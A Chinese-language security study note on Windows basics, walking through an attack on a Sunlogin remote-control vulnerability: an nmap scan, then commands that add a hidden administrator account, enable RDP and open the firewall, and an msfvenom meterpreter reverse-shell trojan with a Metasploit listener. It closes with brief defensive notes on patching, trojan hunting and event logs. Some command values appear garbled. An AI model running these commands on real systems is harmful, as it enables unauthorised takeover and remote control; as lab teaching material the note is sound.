网络安全技术的学习与传播,必须以遵守《中华人民共和国网络安全法》《刑法》 等相关法律法规为前提,严禁将本文技术用于未经授权的计算机系统渗透、攻击、破坏等非法行为。
Windows系统基础-2
知识点:第三方应用程序漏洞、木马排查手段、Windows系统日志分析、Windows Defender防护功能
第三方应用程序漏洞
概念:非系统自带的软件/组件/服务安全缺陷,是常见攻击入口
案例:向日葵远程控制软件漏洞
受影响版本:个人版≤11.0.0.33;简约版≤V1.0.1.43315
攻击流程:
0.获取IP
1.端口扫描(40000-65535,nmap命令)
nmap -p 40000-65535 192.168.x.x
http://192.168.30.132:49152 http://192.168.30.132:49153 http://192.168.30.132:49154 http://192.168.30.132:49155 http://192.168.30.132:49157 http://192.168.30.132:49158 http://192.168.30.132:49161
找到端口49157
2.漏洞利用(JDK8+专用工具,获控制权)
net user abc$ 123456 /add #创建用户
net localgroup Administrators abc /add #提权
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /f #开启允许远程连接
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389 #放行防火墙
3.木马制作与植入
msfconsole # 启动 Metasploit
# ⽣成反向连接⽊⻢(reverse_tcp:⽬标机主动连接攻击机)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=999
9 -f exe > shell.exe
-p :指定 payload(攻击载荷)
LHOST :攻击机 IP(Kali 本机 IP)
LPORT :攻击机监听端⼝(⾃定义,如 9999)
-f exe :⽣成 EXE 格式⽂件
shell.exe :将⽊⻢保存为 shell.exe
# 木马文件复制到 Apache ⽹站根⽬录
mv shell.exe /var/www/html
# 启动 Apache 服务
service apache2 start
远程桌面连接
安装木马并打开
kali主机连接
msfconsole # 若已启动可跳过
use exploit/multi/handler # 加载监听模块
set payload windows/meterpreter/reverse_tcp # 与⽊⻢ payload ⼀致
set lhost 192.168.30.132 # 监听目标机
set lport 9999
run #启动监听
防御手段
及时更新系统和第三方软件
木马排查
进程,网络连接,服务,自启动项,计划任务,第三方工具排查
Windows系统日志分析
日志类型与查看:计算机管理→事件查看器→Windows日志
应用程序日志:软件运行状态(安装/崩溃)
安全日志:账户登录/权限变更/文件访问
系统日志:服务启动/驱动安装/系统错误
